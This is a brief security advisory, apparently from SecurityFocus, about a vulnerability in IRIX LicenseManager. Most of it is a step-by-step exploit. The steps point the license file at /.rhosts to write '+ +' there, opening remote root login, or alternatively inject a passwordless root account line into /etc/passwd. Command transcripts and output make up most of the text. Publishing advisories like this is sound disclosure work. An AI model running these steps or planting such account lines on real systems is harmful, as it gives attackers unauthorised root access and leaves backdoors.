source: http://www.securityfocus.com/bid/72/info

Under normal operation LicenseManager(1M) is a program used to view and manage FLEXlm and NetLS software licenses. Unfortunately, a set of vulnerabilities has been discovered that allows LicenseManager(1M) to
overwrite root-owned files allowing root access.

% setenv NETLS_LICENSE_FILE /.rhosts
% /usr/etc/LicenseManager &

Install...
NetLS Node-locked
Vendor Name: whatever 
Vendor ID: + + 
Product name: whatever 
License version: 1.000 
License version: 
Expiration date: 01-jan-0 

(in license version field put a space) 

Apply 

License(s) succesfully installed 

% cat /.rhosts 
#:# "whatever" "whatever" "1.000" "Incomplete" 
+ + 

If your system has remote root logins disabled, replacing /.rhosts with 
/etc/passwd and + + with toor:0:0::/:/bin/sh.